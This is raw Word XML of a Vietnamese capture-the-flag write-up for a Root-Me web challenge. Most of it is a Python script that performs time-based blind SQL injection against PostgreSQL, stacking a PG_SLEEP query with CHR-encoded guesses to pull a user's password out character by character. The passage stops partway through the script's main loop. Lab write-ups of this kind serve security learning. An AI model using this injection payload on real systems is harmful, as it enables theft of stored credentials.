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55F13" w14:textId="01420DB3" w:rsidR="007C415D" w:rsidRDefault="007C415D" w:rsidP="00512252">
      <w:r>
        <w:t>Đầu tiên ta sẽ vào trang xem thì ta thấy được thông tin chính là ta có thể xem được thông tin trang và thông tin người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7992DA02" w14:textId="0A46039D" w:rsidR="00512252" w:rsidRDefault="007C415D" w:rsidP="00512252">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="581DEEB8" wp14:editId="75AE291B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1398879534" name="Picture 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879534" name="Picture 1" descr="Graphical user interface, application, Word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CEC74" w14:textId="19F733FA" w:rsidR="007C415D" w:rsidRDefault="007C415D" w:rsidP="00512252">
      <w:r>
        <w:t>Tiếp theo ta sẽ code python để truy vấn gửi flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD72B34" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#import libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A12AC8" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2F9AD" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E610C1C" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A52BB" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="58E4B17D" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879F548" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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host</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"http://challenge01.root-me.org/web-serveur/ch40/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3A212" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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session</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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requests</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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session</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412D815A" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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query</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C83A5B" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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flag_characters</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617374AC" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="254FCC7E" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Function to brute force the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0164C7BB" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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def</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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BruteForce</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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password</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F0F21" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="7E040F52" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Generate the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCCBA2E" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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print</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"BruteForce:"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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password</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550F62D5" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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encoded_password</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'||'</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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join</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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([f</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"CHR({</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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ord</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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c</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)})"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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c</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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in</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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password</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F636A" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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payload</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = f</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"2; SELECT (CASE WHEN ((SELECT password from users where id=1 OFFSET 0 LIMIT 1 ) LIKE (</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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{encoded_password}</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)) THEN (SELECT PG_SLEEP(1)) ELSE (SELECT PG_SLEEP(0)) END)--"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5B1C6" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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09A1D1B9" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#find the time it takes to get the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7630D" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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start</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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time</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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time</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709FB014" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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r</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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session</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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get</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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host</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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params</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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={</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"action"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"member"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"member"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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payload</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3932DE9C" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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global</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92DD83" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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query</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> += </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048D86F" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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end</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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time</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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time</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3FF41" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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timing</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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end</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F842DDD" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="3CE05B8A" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#if the time is greater or equal by 1 second, it means that the password is correct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06249879" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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timing</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> &gt;= </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA1D8B" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
    </w:p>
    <w:p w14:paraId="4A4C3131" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Main function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807FA84" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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__name__</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1522925E" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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6A55CFA7" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#First round find the characters in the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C19A6" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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char</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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in</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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string</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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printable</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040E94B" w14:textId="77777777" w:rsidR="007C415D" w:rsidRPr="007C415D" w:rsidRDefault="007C415D" w:rsidP="007C415D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</w:pPr>
      <w:r w:rsidRPr="007C415D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C415D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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char</w:t>
      </w:r>
      <w:r w:rsidRPr="007C415D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 xml:space="preserve"> </w:t>
      </w:r>
